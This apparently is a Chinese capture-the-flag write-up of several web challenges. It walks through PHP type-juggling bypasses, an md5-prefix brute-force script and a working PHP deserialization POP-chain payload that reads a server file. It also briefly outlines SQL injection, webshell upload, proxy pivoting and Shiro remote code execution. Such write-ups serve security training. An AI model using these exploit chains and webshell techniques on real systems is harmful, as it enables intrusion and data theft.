
TheTh1nk3r 2021-06-15 10:05 原文

WEB

0x01 [强网先锋]寻宝

根据题目信息可以知道,需要从中获取两个KEY,然后获得flag
image-20210614215702710
题目源码

<?php
// Note: error_reporting(0) hides every notice/warning the challenge provokes
// (e.g. the undefined 'number3' index caused by the 'nunber3' typo below).
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
// Intentional source disclosure: the script prints its own source to the
// client (magic constants are case-insensitive, so __file__ works).
highlight_file(__file__);

/**
 * Remove every occurrence of a fixed blacklist of substrings from $string.
 *
 * Matching is case-sensitive (no /i flag) and done as a single regex
 * alternation in one preg_replace() pass, so removing one match can expose
 * text that was not matched itself (e.g. "phphp" -> "hp") -- the usual
 * weakness of blacklist filtering. Entries such as '\$', '\(' and '\.' are
 * pre-escaped regex tokens; '\,' and '\'' are just a literal comma and quote.
 *
 * @param string $string raw (attacker-controlled) value
 * @return string the value with all blacklisted substrings stripped
 */
function filter($string){
    $words = ['php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'];
    $pattern = '/(?:' . join('|', $words) . ')/';
    return preg_replace($pattern, '', $string);
}


// --- Challenge logic (vulnerable by design) ---------------------------------
// The defaults below never matter in practice: extract($_POST) (default flag
// EXTR_OVERWRITE) lets the client replace $ppp wholesale via ppp[...] form
// fields -- and can clobber any other variable name as well.
if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";   // typo ('nunber3'): number3 has no default, it must come from POST
$ppp['number4'] = '1';
$ppp['number5'] = '1';

// Sink: variable injection from the request body. Never extract() a request array.
extract($_POST);

// Every value goes through the blacklist once (case-sensitive). Note that
// '0000000' is stripped, which rules out the obvious seven-zero value for number4.
$num1 = filter($ppp['number1']);        
$num2 = filter($ppp['number2']);        
$num3 = filter($ppp['number3']);        
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);    


// Layer 1: must NOT be a numeric string, yet compare greater than 1024.
// A digit prefix with a trailing letter ("1027a") is not numeric; comparing it
// with the int 1024 is true under PHP 7 (leading digits are cast) and under
// PHP 8 (int is cast to string and compared as strings: "1027a" > "1024").
if(isset($num1) && is_numeric($num1)){
    die("非数字");
}

else{
  
    if($num1 > 1024){
    echo "第一层";
        // Layer 2: at most 4 bytes but intval($num2 + 1) > 500000. Exponent
        // notation does it: "6e5" + 1 is the float 600001.0 -> intval 600001.
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二层";
            // Layer 3: only the first 7 hex digits (28 bits) of md5 are checked,
            // so a preimage is brute-forceable offline in seconds.
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三层";
                // Layer 4: loosely == 0, not < 0, <= 0, and exactly 7 bytes long.
                // "0e00000" is a numeric string equal to 0.0, has length 7, and
                // does not contain the blacklisted '0000000'.
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四层";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    // Layer 5: json_decode() returns NULL for invalid JSON, and
                    // `$y = $b === NULL` parses as `$y = ($b === NULL)`, so any
                    // non-empty non-JSON string (e.g. "aaa") passes both checks.
                    $b=json_decode(@$num5);
                        if($y = $b === NULL){
                                if($y === true){
                                    echo "第五层";
                                    // Fixed include path (not user-controlled); KEY1 is defined in it.
                                    include 'KeY1lhv.php';
                                    echo $KEY1;
                                }
                        }else{
                            die("no");
                        }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}

KEY1:

第一层,要求 is_numeric($num1) 为假但 $num1 > 1024 为真。构造 $num1=1027a:带字母后缀的字符串不是数字串,而与整数 1024 比较时,PHP 7 取数字前缀 1027 比较、PHP 8 则按字符串比较 "1027a" > "1024",两种情况下均为真,即可绕过。

第二层,限制 strlen($num2) <= 4 且 intval($num2 + 1) > 500000。使用科学计数法 $num2=6e5:长度只有 3,"6e5" + 1 得到浮点数 600001.0,intval 后为 600001,满足条件。

第三层,只校验 md5 的前 7 位十六进制(28 bit),离线爆破代价很低。写脚本跑 md5,得到 $num3=61823470

import hashlib

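def md5_encode(num3):
    """Return the first 7 hex characters of md5(num3) -- the prefix the challenge compares.

    Kept for compatibility; the generic search below does not depend on the
    fixed prefix length.
    """
    return hashlib.md5(num3.encode()).hexdigest()[0:7]


def find_md5_prefix(prefix, start=0, stop=None):
    """Return the smallest integer i in [start, stop) whose decimal string has an md5 hex digest starting with prefix.

    Args:
        prefix: lowercase hex string to match at the start of the digest.
        start: first candidate integer (inclusive).
        stop: end of the range (exclusive); None searches upward without bound.

    Returns:
        The matching integer, or None when the bounded range is exhausted.
        For a 7-hex-digit prefix the expected work is about 16**7 ~ 2.7e8
        candidates, i.e. seconds to minutes on one core.
    """
    i = start
    while stop is None or i < stop:
        if hashlib.md5(str(i).encode()).hexdigest().startswith(prefix):
            return i
        i += 1
    return None


if __name__ == "__main__":
    # The original window 60000000..700000000 only looks this narrow because
    # the answer was already known; when solving from scratch start at 0.
    hit = find_md5_prefix('4bf21cd', 60000000, 700000000)
    if hit is not None:
        print(hit)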

第四层,要求 $num4 == 0(弱比较)、不小于 0、不大于 0,且长度恰为 7。同样使用科学计数法,构造 $num4=0e00000:它是数值字符串,数值为 0,长度为 7,并且避开了过滤表中的 '0000000'。

第五层,json_decode() 解析非 JSON 数据时返回 NULL;而 `$y = $b === NULL` 按运算符优先级解析为 `$y = ($b === NULL)`,所以任意非空、非 JSON 的字符串(如 $num5=aaa)即可让两层 if 都成立,输出 KEY1。

得到KEY1:KEY1{e1e1d3d40573127e9ee0480caf1283d6}

KEY2:

根据题目描述,使用支持自动分片下载的工具下载文件

解压后得到一堆docx文件

image-20210614220819093

随便打开一个发现是一堆字符,猜测KEY2就在其中某一个文件中,写脚本跑


exp

import os
import docx

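KEY2_MARKER = "KEY2{"


def find_marker(paragraph_texts, marker=KEY2_MARKER):
    """Return the first text in paragraph_texts that contains marker, or None.

    Pure helper (no I/O) so the matching logic can be tested without .docx files.
    """
    for text in paragraph_texts:
        if marker in text:
            return text
    return None


def scan_docx_tree(root=".", shards=range(1, 20), parts=range(1, 20), marker=KEY2_MARKER):
    """Yield (paragraph_text, path) for every file under root/5.<i>/VR_<j>/ whose paragraphs contain marker.

    Same directory grid as the original script. Differences that fix real
    problems in it:
      * a directory that does not exist is skipped instead of aborting the whole
        scan (os.listdir() used to sit outside the try);
      * only Exception is caught for unreadable / non-docx files, so Ctrl-C
        still interrupts the run instead of being swallowed by a bare except;
      * at most one hit per file is reported, as before (the original `break`).
    """
    for i in shards:
        for j in parts:
            folder = "{0}/5.{1}/VR_{2}".format(root, i, j)
            try:
                entries = os.listdir(folder)
            except OSError:
                continue
            for entry in entries:
                path = folder + "/" + entry
                try:
                    document = docx.Document(path)
                    texts = [p.text for p in document.paragraphs]
                except Exception:
                    # not a readable .docx (or corrupt) -- skip this file only
                    continue
                hit = find_marker(texts, marker)
                if hit is not None:
                    yield hit, path


if __name__ == "__main__":
    for text, path in scan_docx_tree():
        print(text)
        print(path)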

得到KEY2 : KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}

在原页面上提交获取flag:

0x02 [强网先锋]赌徒

根据提示扫目录,发现源码备份文件 www.zip,下载解压后得到源码


index.php

<meta charset="utf-8">
<?php
//hint is in hint.php
// E_ERROR only: the notices/warnings the gadget chain produces are hidden,
// and the non-string __toString() result at the end does not stop the flag
// from having been echoed first.
error_reporting(1);


// Gadget 1 / chain entry. unserialize() runs __wakeup() on every Start
// instance inside the payload; __wakeup() echoes "hi" and then echoes $name.
// If $name is an object, that echo triggers its __toString() (see Info).
class Start
{
    public $name='guest';
    // Decoy: a plain string that is only ever echoed by __get(), never executed.
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    // Echoing an object-valued $name is what hands control to the next gadget.
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    // Reached from unserialize(); the leading "hi" the writeup strips before
    // base64-decoding comes from here.
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    // Not used by the chain below (__get only fires on undefined properties).
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

// Gadget 2. Reached when a Start echoes an Info as its $name. __toString()
// reads $this->file['filename'] (attacker-supplied; a Room in the chain) and
// then a property "ffiillee" that Room does not declare, which fires that
// object's __get(). The final value is presumably non-string (NULL), which PHP
// reports as an error -- but only after the flag has already been echoed.
class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    // $file is not declared here; it exists only because the payload sets it.
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

// Gadget 3 / sink. __get() calls whatever $a holds as a function. In the chain
// $a is the Room itself, so the call lands in __invoke(), which reads $filename
// ('/flag' by default) and echoes its base64.
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
	
    // Read of an undeclared property -> call $this->a. With $a set to an
    // object that defines __invoke (here: $this) this is an attacker-chosen call.
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    // Arbitrary file read; the echoed base64 is what the writeup decodes.
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;   // Get_hint() returns NULL, so this echoes nothing extra
    }
}

// Sink: unserialize() of attacker-controlled input (GET parameter "hello").
// With the three classes above loaded this is a complete POP chain ending in
// file_get_contents('/flag'). Never unserialize untrusted data -- use
// json_decode(), or at least unserialize($s, ['allowed_classes' => false]).
if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}

?>

分析源码后,发现入口是 unserialize($_GET['hello']),属于 PHP 反序列化漏洞。利用链为:Start::__wakeup() → echo $this->name 触发 Info::__toString() → 访问 Room 上不存在的属性 ffiillee 触发 Room::__get() → 调用 $this->a(即 Room 自身)触发 Room::__invoke() → Get_hint('/flag') 读取文件并以 base64 输出。构造 pop 链如下

<?php
// Local payload generator; mirrors the target's error level (E_ERROR only).
error_reporting(1);
// Local copy of the target's Start. Only property names/visibility matter to
// serialize(); method bodies never run here. $flag is omitted on purpose --
// unserialize() on the target leaves it at the class default.
class Start
{
    public $name='guest';

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    // On the target this is the chain entry: echoes "hi", then echoes $name.
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag."\n\n";
        return ;
    }
}

// Local copy of the target's Info; the private $phonenumber is dropped so the
// payload is shorter (the target keeps its default). The undeclared $file
// property is added at runtime below.
class Info
{
    public $promise='I do';

    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    // On the target: ->file['filename'] is the Room, ->ffiillee is undefined
    // there and therefore triggers Room::__get().
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

// Local copy of the target's Room; property layout must match exactly so the
// serialized object maps onto the target's class.
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    // On the target: $a === $this, so $function() ends up in __invoke().
    public function __get($name){
        $function = $this->a;
        return $function();
    }

    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

// Wire the chain. Room is the outer object; Start is nested in $sth_to_set and
// unserialize() still runs its __wakeup() (every object in the graph is woken),
// which is what starts the chain on the target.
$start=new Start();
$info=new Info();
$room=new Room();

$info->file['filename']=$room;   // Info::__toString -> Room::__get ("ffiillee" is undeclared on Room)
$start->name=$info;              // Start::__wakeup -> echo $name -> Info::__toString
$room->a=$room;                  // Room::__get -> ($this->a)() -> Room::__invoke -> base64(file_get_contents('/flag'))
$room->sth_to_set=$start;        // nests the Start so its __wakeup fires on unserialize()
// The result goes into ?hello=; urlencode() it before sending if the client
// does not escape quotes/braces/semicolons itself. Output on the target starts
// with "hi" (from __wakeup) followed by the base64 -- strip "hi" before decoding.
echo serialize($room);
?>

将返回内容 base64 解码后得到 flag(注:输出最前面有 Start::__wakeup() 打印的 "hi",要先将其剔除再解码)。

0x03 EasyWeb

扫端口发现还有36842开放

登录页面的用户名处存在 SQL 注入,sqlmap 一把梭,即可获取用户名、密码

登录进后台,扫目录发现上传路由

构造上传,蚁剑连接

使用ew代理出来后扫描端口 ,发现8006开放着jboss服务

获取flag

0x04 Hard_Penetration

shiro rce,注入内存马后使用冰蝎连接,发现当前用户为ctf,无法读取flag,于是使用ew代理出来扫端口,在8005端口有一个php站点,发现为TP3.1.3开发的CMS,审计源码后发现存在文件包含

构造shell去包含

使用蚁剑连接,获得flag
